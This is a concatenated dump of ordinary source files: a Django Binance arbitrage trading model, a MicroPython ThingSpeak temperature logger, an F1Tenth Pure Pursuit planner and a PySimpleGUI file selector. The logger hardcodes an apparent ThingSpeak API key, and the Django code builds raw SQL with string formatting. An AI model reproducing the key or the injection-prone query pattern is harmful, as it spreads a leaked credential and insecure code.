user.\"\"\"\n send_mail(subject, message, from_email, [self.email], **kwargs)\n \n def get_binance_client(self):\n if self.api_key and self.api_secret_key:\n return Client(self.api_key, self.api_secret_key)\n else:\n return None\n \n @property\n def balances(self):\n return [asset for asset in self.get_binance_client().get_account().get('balances') if float(asset.get(\"free\")) > 0 or float(asset.get(\"locked\")) > 0]\n\n @property\n def base_currencies(self):\n ret = []\n if self.do_btc:\n ret.append('BTC')\n if self.do_eth:\n ret.append('ETH')\n if self.do_usdt:\n ret.append('USDT')\n if self.do_bnb:\n ret.append('BNB')\n return ret\n\n @property\n def username(self):\n \"\"\"username属性のゲッター\n\n 他アプリケーションが、username属性にアクセスした場合に備えて定義\n メールアドレスを返す\n \"\"\"\n return self.email\n @property\n def active_scenario_count(self):\n return len([osr for osr in OrderSequenceResult.objects.filter(user__id = self.id) if osr.in_progress])\n\n'''\n 取引可能な通貨ペアのマスタ情報\n'''\nclass Symbol(models.Model):\n class Meta:\n verbose_name = 'シンボル'\n verbose_name_plural = 'シンボル'\n\n def __str__(self):\n return '{symbol} {side}'.format(symbol = self.symbol, side = self.side)\n \n symbol = models.CharField(\n verbose_name = '通貨',\n max_length = 20\n )\n \n from_currency = models.CharField(\n verbose_name = '元通貨',\n max_length = 10\n )\n to_currency = models.CharField(\n verbose_name = '取得通貨',\n max_length = 10\n )\n \n side = models.CharField(\n verbose_name = 'サイド',\n max_length = 10\n )\n @property\n def is_sell(self):\n return self.side == SIDE_SELL\n def get_ticker(self):\n result = Client(None, None).get_ticker(symbol = self.symbol)\n # 売りの場合\n if self.side == SIDE_SELL:\n price = result.get('bidPrice')\n else:\n price = result.get('askPrice')\n return float(price)\n @staticmethod\n def get_scenario_patterns(client, currency = None):\n sql = ''\n sql += 'select'\n sql += ' t1.id as id,'\n sql += ' t1.id as t1_id, '\n sql += ' t2.id as t2_id, '\n sql += ' t3.id as t3_id '\n sql += 'from core_symbol as t1 '\n sql += 'inner join core_symbol as t2 '\n sql += ' on t1.to_currency = t2.from_currency '\n sql += 'inner join core_symbol as t3 '\n sql += ' on t2.to_currency = t3.from_currency '\n sql += 'where t1.from_currency = t3.to_currency '\n if currency:\n sql += \"and t1.from_currency = '{currency}';\".format(currency = currency)\n return Symbol.objects.raw(sql)\n\nclass OrderSequence(models.Model):\n class Meta:\n verbose_name = '注文シナリオ'\n verbose_name_plural = '注文シナリオ'\n\n def __str__(self):\n return '{t1_symbol} - {t2_symbol} - {t3_symbol}'.format(t1_symbol = self.t1_symbol, t2_symbol = self.t2_symbol, t3_symbol = self.t3_symbol)\n \n t1 = models.ForeignKey(\n to = Symbol,\n verbose_name = 't1',\n related_name = 'myseq_t1',\n on_delete = models.CASCADE\n )\n t2 = models.ForeignKey(\n to = Symbol,\n verbose_name = 't2',\n related_name = 'myseq_t2',\n on_delete = models.CASCADE\n )\n t3 = models.ForeignKey(\n to = Symbol,\n verbose_name = 't3',\n related_name = 'myseq_t3',\n on_delete = models.CASCADE\n )\n @property\n def t1_symbol(self):\n return self.t1.symbol\n @property\n def t2_symbol(self):\n return self.t2.symbol\n @property\n def t3_symbol(self):\n return self.t3.symbol\n @property\n def t1_side(self):\n return self.t1.side\n @property\n def t2_side(self):\n return self.t2.side\n @property\n def t3_side(self):\n return self.t3.side\n @property\n def transition(self):\n return '{c1}-{c2}-{c3}-{c4}'.format(c1 = self.t1.from_currency, c2 = self.t1.to_currency, c3 = self.t2.to_currency, c4 = self.t3.to_currency)\n\n\nclass Order(models.Model):\n class Meta:\n verbose_name = '注文'\n verbose_name_plural = '注文'\n def __str__(self):\n return str(self.order_id)\n\n user = models.ForeignKey(\n to = User,\n verbose_name = 'ユーザ',\n on_delete = models.CASCADE\n )\n symbol = models.ForeignKey(\n to = Symbol,\n verbose_name = 'シンボル',\n on_delete = models.CASCADE\n )\n order_id = models.IntegerField(\n verbose_name = 'orderId',\n null = True\n )\n quantity = models.FloatField(\n verbose_name = 'base_数量'\n )\n price = models.FloatField(\n verbose_name = '価格'\n )\n time = UnixTimeStampField(default=0.0)\n \n status = models.CharField(\n verbose_name = 'ステータス',\n max_length = 100,\n null = True\n )\n error_message = models.CharField(\n verbose_name = 'エラーメッセージ',\n null = True,\n blank = True,\n max_length = 100\n )\n @property\n def quote_quantity(self):\n return self.quantity * self.price\n\n @property\n def safe_price(self):\n from decimal import Decimal, ROUND_DOWN\n return \"{0:.8f}\".format(Decimal(self.price))\n \n\n @property\n def is_open(self):\n return self.status in { ORDER_STATUS_NEW, ORDER_STATUS_PARTIALLY_FILLED }\n @property\n def currecy_acquired(self):\n return self.symbol.to_currency\n\n @property\n def amount_acquired(self):\n if self.side == SIDE_SELL:\n return (self.quote_quantity or 0) * (1 - self.user.commission_rate / 100)\n else:\n return self.quantity * (1 - self.user.commission_rate / 100)\n\n @property\n def currency_paid(self):\n return self.symbol.from_currency\n\n @property\n def amount_paid(self):\n if self.side == SIDE_SELL:\n return self.quantity\n else:\n return (self.quote_quantity or 0)\n \n @property\n def actual_rate(self):\n val = self.quote_quantity / self.quantity\n prc = \"{:.\"+str(8)+\"f}\" #first cast decimal as str\n return prc.format(val)\n\n @property\n def str_symbol(self):\n return self.symbol.symbol\n \n @property\n def side(self):\n return self.symbol.side\n\n def place(self):\n client = self.user.get_binance_client()\n try:\n if self.side == SIDE_SELL:\n result = client.order_limit_sell(\n symbol=self.str_symbol,\n quantity=self.quantity,\n price=self.safe_price\n )\n else:\n result = client.order_limit_buy(\n symbol=self.str_symbol,\n quantity=self.quantity,\n price=self.safe_price\n )\n except Exception as e:\n self.status = ORDER_STATUS_REJECTED\n self.error_message = str(e)\n self.save()\n print('{symbol}/qty:{quantity}/price:{price}の注文に失敗:{err}'.format(symbol = self.str_symbol, quantity = self.quatity, price = self.safe_price, err =str(e)))\n \n else:\n self.order_id = result.get('orderId')\n self.time = result.get('transactTime') / 1000\n self.status = result.get('status')\n self.save()\n return self.status != ORDER_STATUS_REJECTED\n def cancel(self):\n if not self.status:\n self.status = ORDER_STATUS_CANCELED\n client = self.user.get_binance_client()\n try:\n result = client.cancel_order(\n symbol=self.str_symbol,\n orderId=self.order_id\n )\n except Exception as e:\n print('{order_id}のキャンセルに失敗:{err}'.format(order_id = self.order_id, err =str(e)))\n else:\n self.time = result.get('transactTime') / 1000\n self.status = result.get('status')\n self.save()\n\n def update_status(self):\n if not self.order_id:\n return False\n client = self.user.get_binance_client()\n try:\n result = client.get_order(\n symbol=self.str_symbol,\n orderId=self.order_id\n )\n except Exception as e:\n print('{order_id}の更新に失敗:{err}'.format(order_id = self.order_id, err = str(e)))\n else:\n self.status = result.get('status')\n self.save() \n\nclass OrderSequenceResult(models.Model):\n class Meta:\n verbose_name = 'シナリオ実行結果'\n verbose_name_plural = 'シナリオ実行結果'\n \n def __str__(self):\n return '利益 : {}'.format(self.profit)\n\n user = models.ForeignKey(\n to = User,\n verbose_name = 'ユーザ',\n on_delete = models.CASCADE\n )\n master = models.ForeignKey(\n to = OrderSequence,\n on_delete = models.CASCADE\n )\n t1_result = models.ForeignKey(\n to = Order,\n on_delete = models.CASCADE,\n related_name = 'seq_t1'\n )\n t2_result = models.ForeignKey(\n to = Order,\n on_delete = models.CASCADE,\n related_name = 'seq_t2'\n )\n t3_result = models.ForeignKey(\n to = Order,\n on_delete = models.CASCADE,\n related_name = 'seq_t3'\n )\n\n @property\n def profit(self):\n return self.t3_result.amount_acquired - self.t1_result.amount_paid\n\n @property\n def time(self):\n return self.t3_result.time\n \n @property\n def in_progress(self):\n if self.t1_result.is_open or not self.t1_result.status:\n return True\n if self.t2_result.is_open or not self.t2_result.status:\n return True\n if self.t3_result.is_open or not self.t3_result.status:\n return True\n return False\n @property\n def is_completed(self):\n return (self.t1_result.status == ORDER_STATUS_FILLED) \\\n and (self.t2_result.status == ORDER_STATUS_FILLED) \\\n and (self.t3_result.status == ORDER_STATUS_FILLED)\n \nclass Scenario(object):\n def __init__(self, orderseq, user):\n self.user = user\n self.orderseq = orderseq\n self.client = self.user.get_binance_client()\n self.is_valid = True\n self.result = None\n if not self.client:\n self.is_valid = False\n self.error_message = 'APIキーが登録されていません'\n \n def get_entry(self, symbol, num):\n result = self.client.get_order_book(symbol = symbol.symbol)\n entry_array = result.get('asks' if symbol.side == SIDE_SELL else 'bids')\n if len(entry_array) < num:\n self.is_valid = False\n self.error_message = '板に{}エントリがありません'.format('買' if symbol.side == SIDE_SELL else '売')\n else:\n return [float(o) for o in entry_array[num - 1]] \n \n def get_order_amount(self, t1_rate, t2_rate, t3_rate):\n pass\n # t1_target_entry = self.get_entry(self.orderseq.t1, 2)\n # t1_rate = orderseq.t1.get_ticker()\n\n # t2_target_entry = _get_2nd_entry(client, orderseq.t2)\n # t2_rate = orderseq.t2.get_ticker()\n \n # t3_target_entry = _get_2nd_entry(client, orderseq.t3)\n # t3_rate = orderseq.t3.get_ticker()\n \n # ## A → B → C → Aとする\n # t1_A_amount = t1_target_entry[1] if orderseq.t1.is_sell else (t1_target_entry[1] * t1_rate)\n # t2_B_amount = t2_target_entry[1] if orderseq.t2.is_sell else (t2_target_entry[1] * t2_rate)\n # t2_A_amount = (t2_B_amount / t1_rate) if orderseq.t1.is_sell else (t2_B_amount * t1_rate)\n # t3_A_amount = (t3_target_entry[1] * t3_rate) if orderseq.t3.is_sell else t3_target_entry[1]\n \n # A_order_amount = 0\n\n # if t1_A_amount >= t2_A_amount:\n # if t2_A_amount >= t3_A_amount:\n # A_order_amount = t3_A_amount\n # else:\n # A_order_amount = t2_A_amount\n # else:\n # if t1_A_amount >= t3_A_amount:\n # A_order_amount = t3_A_amount\n # else:\n # A_order_amount = t1_A_amount\n \n # return A_order_amount\n @staticmethod\n def round_by_step(a, MinClip):\n return math.floor(float(a) / MinClip) * MinClip\n @staticmethod\n def floating_decimals(amount, precision):\n # prc = \"{:.\"+str(dec)+\"f}\" #first cast decimal as str\n # return prc.format(f_val)\n return float(\"{:0.0{}f}\".format(amount, precision))\n @staticmethod\n def get_valid_amount(symbol_info, amount):\n precision = symbol_info.get('baseAssetPrecision')\n step = float([f for f in symbol_info.get('filters') if f.get('filterType') == 'LOT_SIZE'][0].get('stepSize'))\n return Scenario.floating_decimals(Scenario.round_by_step(amount, step), precision)\n @staticmethod\n def violate_min_notional(symbol_info, side, rate, amount):\n min_notional = float([f for f in symbol_info.get('filters') if f.get('filterType') == 'MIN_NOTIONAL'][0].get('minNotional'))\n notional = rate * amount\n if notional < min_notional:\n print('min notional:{mn}に対し{n}で発注しようとしています symbol:{symbol}, side:{side}, amount:{amount}, rate:{rate} '.format(mn = min_notional, n = notional, symbol = symbol_info.get('symbol'), side = side, amount = amount, rate = rate))\n return notional < min_notional\n\n def get_order_unit_amount(self):\n base_currency = self.orderseq.t1.from_currency.lower()\n return getattr(self.user, '{}_unit_amount'.format(base_currency))\n \n def estimate(self):\n if not self.is_valid:\n return False\n n = 1\n\n commission_rate = self.user.commission_rate\n\n try:\n t1_price = self.get_entry(self.orderseq.t1, n)[0]\n t2_price = self.get_entry(self.orderseq.t2, n)[0]\n t3_price = self.get_entry(self.orderseq.t3, n)[0]\n except TypeError:\n return False\n\n # 現在の所有分を確認\n balance = float(self.client.get_asset_balance(asset = self.orderseq.t1.from_currency).get('free'))\n unit = self.get_order_unit_amount()\n\n if unit > balance:\n self.is_valid = False\n self.error_message = '注文しようとする数量を持ち合わせておりません: 期待={unit}, 所有={free}'.format(unit = unit, free = balance)\n return None\n\n t1_amount_temp = unit if self.orderseq.t1.is_sell else (unit / t1_price)\n t1_symbol_info = self.client.get_symbol_info(symbol = self.orderseq.t1.symbol)\n t1_amount = Scenario.get_valid_amount(t1_symbol_info, t1_amount_temp)\n \n if self.orderseq.t1.is_sell:\n initial_cost = t1_amount\n else:\n initial_cost = t1_amount * t1_price\n \n # 注文数量が正しいかどうか確認\n if Scenario.violate_min_notional(t1_symbol_info, self.orderseq.t1.side, t1_price, t1_amount):\n self.is_valid = False\n self.error_message = 't1の注文数量が不正です'\n return None\n\n b_acquired = (t1_amount * t1_price) if self.orderseq.t1.is_sell else t1_amount\n b_acquired *= ((100 - commission_rate) / 100)\n \n self.t1_info = {\n 'symbol': self.orderseq.t1.symbol,\n 'quantity': t1_amount,\n 'rate': t1_price,\n 'side': self.orderseq.t1.side,\n 'currency_acquired': self.orderseq.t1.to_currency,\n 'amount_acquired': b_acquired,\n 'symbol_info': t1_symbol_info\n }\n \n # t2 取引\n t2_symbol_info = self.client.get_symbol_info(symbol = self.orderseq.t2.symbol)\n t2_amount_temp = b_acquired if self.orderseq.t2.is_sell else (b_acquired / t2_price)\n t2_amount = Scenario.get_valid_amount(t2_symbol_info, t2_amount_temp)\n # 注文数量が正しいかどうか確認\n if Scenario.violate_min_notional(t2_symbol_info, self.orderseq.t2.side, t2_price, t2_amount):\n self.is_valid = False\n self.error_message = 't2の注文数量が不正です'\n return None\n c_acquired = (t2_amount * t2_price) if self.orderseq.t2.is_sell else t2_amount\n c_acquired *= ((100 - commission_rate) / 100)\n \n self.t2_info = {\n 'symbol': self.orderseq.t2.symbol,\n 'quantity': t2_amount,\n 'rate': t2_price,\n 'side': self.orderseq.t2.side,\n 'currency_acquired': self.orderseq.t2.to_currency,\n 'amount_acquired': c_acquired,\n 'symbol_info': t2_symbol_info\n }\n\n ''' t3取引 '''\n t3_symbol_info = self.client.get_symbol_info(symbol = self.orderseq.t3.symbol)\n t3_amount_temp = c_acquired if self.orderseq.t3.is_sell else (c_acquired / t3_price)\n t3_amount = Scenario.get_valid_amount(t3_symbol_info, t3_amount_temp)\n # 注文数量が正しいかどうか確認\n if Scenario.violate_min_notional(t3_symbol_info, self.orderseq.t3.side, t3_price, t3_amount):\n self.is_valid = False\n self.error_message = 't3の注文数量が不正です'\n return None\n\n #a_acquired_ret = (c_acquired * t3_price) if self.orderseq.t3.is_sell else (c_acquired / t3_price)\n a_acquired = t3_amount * t3_price if self.orderseq.t3.is_sell else t3_amount\n a_acquired *= ((100 - commission_rate) / 100)\n \n self.t3_info = {\n 'symbol': self.orderseq.t3.symbol,\n 'quantity': t3_amount,\n 'rate': t3_price,\n 'side': self.orderseq.t3.side,\n 'currency_acquired': self.orderseq.t3.to_currency,\n 'amount_acquired': a_acquired,\n 'symbol_info': t3_symbol_info\n }\n \n self.profit = Scenario.floating_decimals(a_acquired - initial_cost, 8)\n self.profit_rate = Scenario.floating_decimals(self.profit / initial_cost * 100, 3)\n \n def execute(self):\n t1_obj = Order()\n t1_obj.user = self.user\n t1_obj.symbol = self.orderseq.t1\n t1_obj.quantity = self.t1_info.get('quantity')\n t1_obj.price = self.t1_info.get('rate')\n \n t1_obj.save()\n \n # 注文が拒否もしくは期限切れした場合\n if t1_obj.status in { ORDER_STATUS_REJECTED, ORDER_STATUS_EXPIRED }:\n self.is_valid = False\n self.error_message = '注文が失敗しました {}'.format(t1_obj.error_message)\n return\n time.sleep(1)\n \n # t2実行\n t2_obj = Order()\n t2_obj.user = self.user\n t2_obj.symbol = self.orderseq.t2\n t2_obj.quantity = self.t2_info.get('quantity')\n t2_obj.price = self.t2_info.get('rate')\n t2_obj.save()\n\n t3_obj = Order()\n t3_obj.user = self.user\n t3_obj.symbol = self.orderseq.t3\n t3_obj.quantity = self.t3_info.get('quantity')\n t3_obj.price = self.t3_info.get('rate')\n t3_obj.save()\n\n osr = OrderSequenceResult()\n osr.user = self.user\n osr.master = self.orderseq\n osr.t1_result = t1_obj\n osr.t2_result = t2_obj\n osr.t3_result = t3_obj\n osr.save()\n self.result = osr","repo_name":"shusaku-ishikawa/binance","sub_path":"backend/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":23873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26189533615","text":"# ************************************** \r\nfrom machine import Pin\r\nimport machine \r\nimport network \r\nimport comptes_wifi \r\nimport urequests\r\nimport time\r\nimport onewire\r\nimport ds18x20\r\n# **************************************\r\n\r\n# ************Affichage Erreur **********\r\nLed_builtin = Pin('LED',Pin.OUT)# RP2 W ou 25 pour RP2\r\nLed_builtin.off()\r\n \r\ndef affichage_erreur(code) : # 1 wifi, 2 capteur 3 http \r\n if code == 1 : \r\n while True:\r\n Led_builtin.toggle() #changement état\r\n time.sleep_ms(500)\r\n if code == 2 : \r\n while True:\r\n Led_builtin.toggle() #changement état\r\n time.sleep_ms(50)\r\n if code == 3 : \r\n while True:\r\n Led_builtin.on() #ON \r\n time.sleep(10) \r\n# **************************************\r\n\r\n\r\n# **********connexion wifi**************\r\nssid = comptes_wifi.ssid\r\npassword = comptes_wifi.password\r\n\r\ndef connexion_wifi_STA(pssid,ppassword) : # Connexion wifi mode STATION\r\n wlan = network.WLAN(network.STA_IF)\r\n wlan.active(True)\r\n wlan.connect(pssid, ppassword)\r\n\r\n # Wait for connect or fail\r\n max_wait = 10\r\n while max_wait > 0:\r\n if wlan.status() < 0 or wlan.status() >= 3:\r\n break\r\n max_wait -= 1\r\n print('waiting for connection...')\r\n time.sleep(1)\r\n\r\n # Handle connection error\r\n if wlan.status() != 3:\r\n affichage_erreur(1)\r\n #raise RuntimeError('network connection failed')\r\n else:\r\n print('connected')\r\n status = wlan.ifconfig()\r\n print( 'ip = ' + status[0] )\r\n Led_builtin.on()\r\n time.sleep(3)\r\n Led_builtin.off()\r\n# **************************************\r\n\r\n# **********mesure capteur DS18x20******\r\now = onewire.OneWire(Pin(15))\r\nds = ds18x20.DS18X20(ow)\r\nadresse_capteur1 = bytearray(b'(\\xfefffra\\x81\\x17\\x04*')\r\n\r\ndef mesure_capteur(adresse_capteur1) :\r\n try :\r\n ds.convert_temp()\r\n time.sleep_ms(750)\r\n temperature =ds.read_temp(adresse_capteur1)\r\n temperature = int(temperature)\r\n print('La température actuelle est de : ',temperature)\r\n return temperature\r\n except :\r\n affichage_erreur(2)\r\n# **************************************\r\n\r\n# *********Connexion ThingSpeak*****************************\r\nchamp = 'field1' #salon\r\ndef send_temperature_ThingSpeak(temperature) :\r\n data_capteur = str(temperature)\r\n try : \r\n print('https://api.thingspeak.com/update?api_key=94E2Q0HA89TJVJH4&{}={}'.format(champ,data_capteur))\r\n request = urequests.get('https://api.thingspeak.com/update?api_key=94E2Q0HA89TJVJH4&{}={}'.format(champ,data_capteur))\r\n request.close()\r\n print('données envoyées')\r\n except :\r\n print(\"Pb d'envoi\")\r\n affichage_erreur(3)\r\n# **************************************\r\n\r\n\r\n# *************main*************************\r\nwhile True : \r\n print(\"lancement de l'application\")\r\n print(\"Connexion wifi\")\r\n connexion_wifi_STA(ssid,password)\r\n print(\"Mesure capteur\")\r\n temperature = mesure_capteur()\r\n print(temperature)\r\n print(\"Envoi donnée ThingSpeak\")\r\n send_temperature_ThingSpeak(temperature)\r\n print('mise en sommeil légé') #RP2 ne permet pas le sommeil profond\r\n time.sleep(3) #temps d'affichage avant mise en sommeil\r\n machine.lightsleep(3600000) #1 heure\r\n# ****************************************\r\n\r\n\r\n\r\n \r\n","repo_name":"christianDUCROS/ThingSpeak","sub_path":"monitoring_thingspeak__capteur_micropython.py","file_name":"monitoring_thingspeak__capteur_micropython.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75192251881","text":"\"\"\"\nPartial code source: https://github.com/f1tenth/f1tenth_gym\nExample waypoint_follow.py from f1tenth_gym\nSpecific function used:\n- nearest_point_on_trajectory_py2\n- first_point_on_trajectory_intersecting_circle\n- get_actuation\n\nAdjustments have been made\n\n\"\"\"\n\nimport numpy as np\nfrom F1TenthRacingDRL.Utils.utils import init_file_struct, calculate_speed\nfrom numba import njit\nimport csv\nimport os\nfrom matplotlib import pyplot as plt\nfrom F1TenthRacingDRL.Planners.TrackLine import TrackLine\nfrom F1TenthRacingDRL.Planners.VehicleStateHistory import VehicleStateHistory\n\n\n\nclass PurePursuit:\n def __init__(self, conf, run, init=True):\n self.name = run.run_name\n path = os.getcwd() + f\"/Data/\" + run.path + self.name + \"/\"\n if not os.path.exists(path):\n os.mkdir(path)\n elif init:\n init_file_struct(path)\n \n self.conf = conf\n self.run = run\n\n self.racing_line = run.racing_line\n self.speed_mode = run.pp_speed_mode\n self.max_speed = run.max_speed\n self.track_line = TrackLine(run.map_name, run.racing_line, False)\n # self.track_line = TrackLine(run.map_name, run.racing_line, True)\n # self.lookahead = run.lookahead\n\n self.v_min_plan = conf.v_min_plan\n self.wheelbase = conf.l_f + conf.l_r\n self.max_steer = conf.max_steer\n \n self.vehicle_state_history = VehicleStateHistory(run, f\"Testing{run.map_name.upper()}/\")\n\n self.counter = 0\n\n def plan(self, obs):\n position = np.array([obs['poses_x'][0], obs['poses_y'][0]])\n theta = obs['poses_theta'][0]\n # lookahead = 1.9\n # lookahead = 1.5\n # r_speed = self.track_line.get_raceline_speed(position)\n # lookahead = 0.4 + 0.18 * r_speed \n # lookahead = 0.3 + 0.15 * r_speed \n lookahead = 0.4 + 0.16 * obs['linear_vels_x'][0] \n # lookahead = 0.3 + 0.19* obs['linear_vels_x'][0] \n # lookahead = 0.7 + 1* obs['linear_vels_x'][0] / 8\n # lookahead = 0.9 + 0.6 * obs['linear_vels_x'][0] / 8\n # lookahead = self.lookahead\n lookahead_point = self.track_line.get_lookahead_point(position, lookahead)\n\n if obs['linear_vels_x'][0] < self.v_min_plan:\n return np.array([0.0, 4])\n\n speed_raceline, steering_angle = get_actuation(theta, lookahead_point, position, lookahead, self.wheelbase)\n steering_angle = np.clip(steering_angle, -self.max_steer, self.max_steer)\n if self.speed_mode == 'constant':\n speed = 2\n elif self.speed_mode == 'link':\n speed = calculate_speed(steering_angle, 0.8, 7)\n elif self.speed_mode == 'racing_line':\n speed = speed_raceline \n else:\n raise Exception(f\"Invalid speed mode: {self.speed_mode}\")\n \n # speed = speed * 0.97\n speed = min(speed, self.max_speed) # cap the speed\n\n action = np.array([steering_angle, speed])\n \n self.vehicle_state_history.add_memory_entry(obs, action)\n\n return action\n\n def done_callback(self, final_obs):\n self.vehicle_state_history.add_memory_entry(final_obs, np.array([0, 0]))\n self.vehicle_state_history.save_history()\n \n progress = self.track_line.calculate_progress_percent([final_obs['poses_x'][0], final_obs['poses_y'][0]]) * 100\n \n print(f\"Test lap complete --> Time: {final_obs['lap_times'][0]:.2f}, Colission: {bool(final_obs['collisions'][0])}, Lap p: {progress:.1f}%\")\n\n\n\n@njit(fastmath=False, cache=True)\ndef get_actuation(pose_theta, lookahead_point, position, lookahead_distance, wheelbase):\n waypoint_y = np.dot(np.array([np.sin(-pose_theta), np.cos(-pose_theta)]), lookahead_point[0:2]-position)\n speed = lookahead_point[2]\n if np.abs(waypoint_y) < 1e-6:\n return speed, 0.\n radius = 1/(2.0*waypoint_y/lookahead_distance**2)\n steering_angle = np.arctan(wheelbase/radius)\n return speed, steering_angle\n\n","repo_name":"BDEvan5/F1TenthRacingDRL","sub_path":"F1TenthRacingDRL/Planners/PurePursuit.py","file_name":"PurePursuit.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"10527275092","text":"# -*- coding: utf-8 -*-\r\nimport PySimpleGUI as sg\r\nimport Projet2\r\nimport fenetreComparaison\r\nimport re\r\n\r\n#Création d'une fenêtre de choix d'un fichier de comparaison\r\ndef createComparisonFileSelect(results) :\r\n #Variables globales\r\n _VARS = {'window': False}\r\n\r\n numberOfRows = len(results[2]) if isinstance(results[2] , list) else 1\r\n \r\n dataFilePath = \"\"\r\n entete = 2\r\n lignesDonnees = 20\r\n colonneDebit = \"G,I,K,M,O\"\r\n colonneAmont =\"H,J,L,N,P\"\r\n \r\n #Fonction permetttant seulement l'entrée d'un entier dans un champ texte\r\n def UpdateInputInt(event, values, forceZero = False):\r\n global entete\r\n global lignesDonnees\r\n \r\n inputValue = _VARS['window'][event]\r\n previousValue = inputValue.metadata\r\n \r\n #Si le champ est désactivé la saisie est ignorée\r\n if inputValue.Widget[\"state\"] == \"readonly\":\r\n return\r\n \r\n if values[event] != \"\" :\r\n try :\r\n #Vérifier si la conversion est possible\r\n newValue = str(int(values[event]))\r\n \r\n #Éviter de devoir supprimer le 0, suppression auto\r\n if previousValue == \"0\" and newValue != \"0\":\r\n newValue = newValue.replace(\"0\",\"\")\r\n \r\n #Mise à jour des valeurs du champs et des variables associées\r\n inputValue.metadata = newValue\r\n inputValue.Update(newValue)\r\n if event == \"-ENTETE-\" :\r\n entete = int(newValue)\r\n elif event == \"-LIGNESDONNEES-\" :\r\n lignesDonnees = int(newValue)\r\n \r\n except :\r\n #Si ce n'est pas un entier, on ignore la saisie en recopiant la dernière valeur enregistrée\r\n values[event] = previousValue\r\n inputValue.Update(values[event])\r\n else :\r\n #Ne pas autoriser la valeur \"\"\r\n if forceZero :\r\n inputValue.metadata = \"0\"\r\n if event == \"-ENTETE-\" :\r\n entete = 0\r\n elif event == \"-LIGNESDONNEES-\" :\r\n lignesDonnees = 0\r\n inputValue.Update(0)\r\n else : \r\n inputValue.metadata = \"\" \r\n \r\n #Fonction permetttant seulement l'entrée de colonnes (Lettres, \",\" et \" \")\r\n def UpdateInputColumn(event, values):\r\n global colonneDebit\r\n global colonneAmont\r\n \r\n inputValue = _VARS['window'][event]\r\n previousValue = inputValue.metadata\r\n \r\n #Si le champ est désactivé la saisie est ignorée\r\n if inputValue.Widget[\"state\"] == \"readonly\":\r\n return\r\n \r\n if values[event] != \"\" :\r\n \r\n #Vérifier que la valeur est une lettre\r\n if not re.search('[^a-zA-Z, ]', values[event]) :\r\n #Mise en forme en majuscule\r\n newValue = values[event].upper().replace(\" \",\"\")\r\n \r\n #Mise à jour des valeurs du champs et des variables associées\r\n inputValue.metadata = newValue\r\n inputValue.Update(newValue)\r\n if event == \"-COLONNEDEBIT-\" :\r\n colonneDebit = newValue\r\n elif event == \"-COLONNEAMONT-\" :\r\n colonneAmont = newValue\r\n \r\n else :\r\n #Si ce n'est pas une lettre, on ignore la saisie en recopiant la dernière valeur enregistrée\r\n values[event] = previousValue\r\n inputValue.Update(values[event])\r\n else :\r\n inputValue.metadata = \"\" \r\n \r\n \r\n ####################################################################################################################################\r\n ###LAYOUT\r\n ####################################################################################################################################\r\n \r\n #Layout générale de la fenêtre\r\n layout = [\r\n [sg.Text(\"Fichier de données : \"),\r\n sg.In(dataFilePath, size=(25, 1), enable_events=True, key=\"-DATAFILE-\", disabled = True, readonly= True),\r\n sg.FileBrowse('Parcourir')],\r\n \r\n [sg.Text(\"Nombre de lignes d'en-tête\"), sg.Push(),\r\n sg.InputText(str(entete), size =(4,1), key ='-ENTETE-', enable_events=True, metadata = str(entete))],\r\n \r\n [sg.Text(\"Colonnes des débits\"), sg.Push(),\r\n sg.InputText(colonneDebit, size =(10,1), key ='-COLONNEDEBIT-', enable_events=True, metadata = colonneDebit)],\r\n \r\n [sg.Text(\"Colonnes des puissances\"), sg.Push(),\r\n sg.InputText(colonneAmont, size =(10,1), key ='-COLONNEAMONT-', enable_events=True, metadata = colonneAmont),\r\n ],\r\n [sg.Push(),\r\n sg.Button(button_text=\"Comparer\", size=(25, 3), key=\"-COMPAREBUTTON-\", disabled= True, tooltip = \"Saisir un fichier de comparaison\"),\r\n sg.Push()\r\n ],\r\n ]\r\n \r\n \r\n #Création de la fenêtre\r\n _VARS['window'] = sg.Window('Fichier de comparaison',\r\n layout,\r\n finalize=True,\r\n resizable=False,\r\n \r\n element_justification=\"left\")\r\n \r\n \r\n ####################################################################################################################################\r\n ###WINDOW LIFE\r\n ####################################################################################################################################\r\n \r\n \r\n \r\n \r\n while True:\r\n event, values = _VARS['window'].read(timeout=200)\r\n if event == sg.WIN_CLOSED or event == 'Exit':\r\n break\r\n elif \"COLONNE\" in event :\r\n #Une modification de la valeur dans les champs de colonnes\r\n UpdateInputColumn(event, values)\r\n elif event == \"-ENTETE-\" :\r\n #Une modification de la valeur dans le champs du nombre de lignes d'entete\r\n UpdateInputInt(event, values, True)\r\n elif event == \"-LIGNESDONNEES-\" :\r\n #Une modification de la valeur dans le champs du nombre de lignes de données dans le fichier\r\n UpdateInputInt(event, values, True)\r\n elif event == \"-DATAFILE-\":\r\n #Une modification de la valeur dans la selection d'un fichier de données\r\n if not values[\"-DATAFILE-\"] ==\"\" :\r\n _VARS['window'][\"-COMPAREBUTTON-\"].update(disabled=False)\r\n _VARS['window'][\"-COMPAREBUTTON-\"].SetTooltip(None)\r\n dataFilePath = values[\"-DATAFILE-\"]\r\n elif event == \"-COMPAREBUTTON-\":\r\n #Un appui sur le bouton de comparaison\r\n try :\r\n #Lecture des valeurs\r\n original_data_debits = Projet2.readExcelValues(entete, numberOfRows, colonneDebit, \"\", dataFilePath)\r\n original_data_puissances = Projet2.readExcelValues(entete, numberOfRows, colonneAmont, \"\", dataFilePath)\r\n #Céation de la fenetre d'affichage des résultats\r\n fenetreComparaison.createComparisonWindow(results, original_data_puissances, original_data_debits, _VARS['window'])\r\n except :\r\n #Si échec de la sauvegarde c'est que le fichier est ouvert, on l'afffiche à l'utilisateur\r\n sg.Popup(\"Erreur de lecture du fichier, veuillez vous assurer que les informations sont correctes\", title=\"Erreur à la lecture\", button_color= \"red\")\r\n \r\n _VARS['window'].close()\r\n ","repo_name":"Iilu-n/Projet_Optimisation","sub_path":"selectionFichierComparaison.py","file_name":"selectionFichierComparaison.py","file_ext":"py","file_size_in_byte":7769,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1796336545","text":"# -*- coding: utf-8 -*-\n\nimport redis\n\nimport fetch_util\nimport 